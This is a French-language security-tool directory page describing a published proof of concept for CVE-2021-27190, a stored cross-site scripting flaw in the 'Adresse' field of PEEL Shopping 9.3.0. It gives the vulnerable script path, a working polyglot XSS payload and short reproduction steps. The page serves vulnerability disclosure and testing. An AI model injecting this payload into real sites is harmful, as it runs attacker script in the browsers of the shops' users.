Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS — Preuve de concept de l'exploit pour CVE-2021-27190 : vulnérabilité de Cross-Site Scripting stocké dans le panier d'achat PEEL Shopping 9.3.0 via le paramètre 'Address', avec charge utile et vidéo de démonstration. | Kitploit
Outils/GitHubGitHub/anmolksachan/cve-2021-27190-peel-shopping-cart-9.3.0-stored-xss
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionApprentissage et Éducation
GitHubanmolksachan/cve-2021-27190-peel-shopping-cart-9.3.0-stored-xss

CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS

Preuve de concept de l'exploit pour CVE-2021-27190 : vulnérabilité de Cross-Site Scripting stocké dans le panier d'achat PEEL Shopping 9.3.0 via le paramètre 'Address', avec charge utile et vidéo de démonstration.

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt
33il y a 5 ansPas encore vérifié

CVE-2021-27190 - PEEL Shopping, panier d'achat eCommerce - Vulnérabilité de Cross-Site Scripting stocké dans 'Adresse'

Watch the video

Date

2021-02-11

Auteur de l'exploit

Anmol K Sachan

Page d'accueil du fournisseur

https://www.peel.fr/

Lien du logiciel

https://www.peel.fr/nos-offres-1/peel-shopping-31.html
https://sourceforge.net/projects/peel-shopping/

Lien du logiciel vulnérable

https://drive.google.com/file/d/1dIwRdaqtEyqUUgxbRqrHiS5WQ10nEG8z/view?usp=sharing

Logiciel :

PEEL SHOPPING 9.3.0

Type de vulnérabilité

Cross-Site Scripting stocké

Vulnérabilité

XSS stocké

Testé sur Windows 10 XAMPP


CVE attribué

CVE-2021-27190
Cette application est vulnérable à une vulnérabilité XSS stockée.

Script vulnérable

http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php

https://github.com/anmolksachan/CVE-2021-27190-PEEL-Shopping-cart-9.3.0-Stored-XSS/edit/main/README.MD## Paramètres vulnérables 'Adresse'

Charge utile utilisée

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

POC

https://drive.google.com/file/d/1t1hksDsYqYsqryRq61tNIQQMTCFidtc1/view
Sur la même page où nous avons injecté la charge utile, cliquez sur la zone de texte pour modifier l'adresse.
Vous verrez votre code JavaScript (XSS) exécuté.

Références

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27190
  2. https://packetstormsecurity.com/files/161367/PEEL-Shopping-9.3.0-Cross-Site-Scripting.html
  3. https://www.exploit-db.com/exploits/49553
  4. https://www.secuneus.com/cve-2021-27190-peel-shopping-ecommerce-shopping-cart-stored-cross-site-scripting-vulnerability-in-address/
  5. https://cxsecurity.com/issue/WLB-2021020054
  6. https://nvd.nist.gov/vuln/detail/CVE-2021-27190
Télécharger l’outil